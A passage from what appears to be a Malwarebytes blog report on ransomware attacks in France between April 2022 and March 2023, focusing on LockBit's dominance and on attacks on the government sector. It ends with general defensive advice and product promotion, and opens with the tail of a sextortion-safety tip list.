• Don’t engage: report. If you’re shown evidence of stolen images, report to your local authorities and the FBI as soon as you can. Never engage with the sextortionist.
• Be cautious about what you say to someone online. When asked certain questions, be vague and never give specifics. Remember that online, people can pretend to be someone they’re not, and can even look and sound like a different person with today’s technology.
• Personalize your security and privacy settings. Lock down your accounts as much as you can, and keep as much hidden from public view as possible.
• Data is typically forever. Remember that once you send something to someone—whether they’re a stranger, a romantic partner, relative, or friend—you have no control over where it goes next.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their dark web sites. In this report, “known attacks” are attacks where the victim opted not to pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher.

Between April 2022 and March 2023, France was one of the most attacked countries by ransomware gangs. During that period:

• France was the fifth most attacked country in the world.
• The government sector was attacked more often than in similar countries.
• LockBit dominated the last twelve months, being used in 57% of known attacks.
• There were almost twice as many LockBit attacks in France than either the UK or Germany.

In July 2022, La Poste Mobile, a mobile carrier owned by French postal company La Poste, suffered a LockBit ransomware attack, severely impacting its administrative and management services. After successfully reducing the ransom demand from $1.4 million to $300,000 in a five day negotiation, La Poste Mobile’s negotiator announced on July 11, “Management doesn’t want to pay anymore … it has reconsidered its decision.” LockBit published the data it had stolen on its leak site, describing it as “the private information of more than a million and a half people in France.”

In August 2022, attackers demanded $10 million after a ruthless assault on the Center Hospitalier Sud Francilien (CHSF), a 1000-bed hospital near Paris. The disruption to CHSF’s computer systems resulted in patients having to be sent elsewhere, and surgeries having to be postponed.

A few months later, in mid-November, French defense and technology group Thales confirmed a data breach affecting contracts and partnerships in Malaysia and Italy. As with so many attacks in France in the last twelve months, the perpetrators used LockBit ransomware.

France is a prime target

In the 12 months from April 2022 to March 2023, France was a globally significant target for ransomware, and the fifth most attacked country by known attacks.

Given the disparity between the USA and the rest of the world in terms of number of attacks it would be easy to conclude that ransomware is, first-and-foremost, a USA problem. It is not. The size and nature of the US economy means that it has many more targets for ransomware gangs than the other countries in the top ten.

We can account for the difference in the size of countries’ economies by dividing the number of known ransomware attacks by a country’s nominal GDP, which gives us an approximate rate of attacks per $1T of economic output. On that basis, the difference between France and the USA is far smaller than the total number of known attacks would suggest. And while France and Germany suffered nearly identical numbers of known attacks, France appears to suffer a much higher rate of attacks per unit of economic activity than its neighbour.

The size of the countries in the top ten also vary enormously, and we can try to account for that by dividing known attacks by the size of each country’s population. On that measure, again, the differences between countries are far smaller than a simple count of known attacks suggests.

In all the variations of our top ten, English-speaking countries occupy at least three of the top five positions, which suggests that ransomware gangs have a slightly bias for English-speaking targets. France sits just below the Anglosphere in a cluster of four advanced European economies suffering nearly identical rates of attacks per capita.

By any measure, France is one of the most attacked countries in the world, and its organisations are prime targets for ransomware gangs. Unusually, government targets accounted for a significant proportion of those organisations in the last twelve months. It was the country’s third most attacked sector, accounting for 9% of known attacks. By comparison, over the same twelve month period, 4% of known attacks in the USA and 3% of known attacks in Germany affected their government sectors, while just 20 miles across the English channel, the UK experienced none at all.

As is often the case, the reasons for this are not obvious. It is possible that this simply reflects the larger footprint of government in France—government spending accounts for a larger proportion of the economy in France than in either the UK or Germany. However, the difference is only a few percentage points.

Ransomware gangs often operate from the safe havens of Russia and the Commonwealth of Independent states, which can make it tempting to ascribe nationalistic or geopolitical motivations to their activity. However, the truth is they are businesses that choose targets that are easy to infiltrate and likely to pay substantial ransoms.

Unfortunately, the most likely explanation for the high proportion of government sector targets among the known attacks in France is that government institutions were easier targets in France than elsewhere.

LockBit’s hunting ground

The most dangerous ransomware in the world right now, is LockBit, and LockBit loves France.

In 2022, LockBit was used in 31% of known attacks globally, 3.5 times more than its nearest competitor, ALPHV. (You can read much more about why LockBit is the number one threat to your business in our 2023 State of Malware report.) As you’d expect, given its global preeminence, LockBit was also the most widely used ransomware in France, Germany, and the UK in the last twelve months.

However, LockBit dominates in France in a way that it doesn’t in its European neighbours. Between April 2022 and March 2023, LockBit accounted for an absolutely enormous 57% of known attacks in France. Over the same period, it accounted for 20% of known attacks in the UK and about 30% in Germany.

LockBit recorded 62 known attacks in France in the last twelve months, but no other gang registered more than seven. In the same period LockBIt was responsible for 33 known attacks in the UK while six other gangs also got into double digits.

LockBit’s outsized contribution to France’s misery is most clearly seen by highlighting its contribution on a month-by-month basis. The number of monthly attacks in France has been highly volatile, showing far larger variation than the UK, despite its proximity and the similarity of their economies and populations. That volatility is almost entirely down to how many or how few LockBit attacks occurred each month. In the last twelve months only one other gang has registered three known attacks in a single month (Royal in March 2023), while LockBit has matched or exceeded that figure eight times, and exceeded ten attacks in a month twice.

The reasons for this aren’t clear, but it may simply be that as the 800lb gorilla in the ransomware ecosystem, LockBit is best placed to exploit opportunities outside of the Anglosphere. Like a lot of ransomware, LockBit is sold as a service and attacks are carried out by independent criminal gangs, referred to as “affiliates”, which pay the LockBit gang 20% of the ransoms they extract. The French economy is large enough to provide a fertile hunting ground for cybercriminals. It is possible that some of LockBit’s 100 or so affiliates have decided to specialise there.

Conclusions

In the last 12 months, France was a globally significant hunting ground for ransomware gangs, and the country with the fifth highest total of known attacks. Within France, the government sector was over represented, suffering a higher proportion of known attacks than the government sector in the USA, Germany, and the UK. Much like the education sector in the UK, the French government sector should be alarmed that with an entire world of targets to choose from, it has attracted a disproportionate amount of attention.

France attracted enormous attention from gangs using LockBit, the most dangerous ransomware in the world. There were almost twice as many known LockBit attacks in France than in either Germany or the UK. In all, LockBit was used in 57% of known attacks in France, while the next most used ransomware, Vice Society, accounted for just 6%.

France does not so much have a ransomware problem as a LockBit problem.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW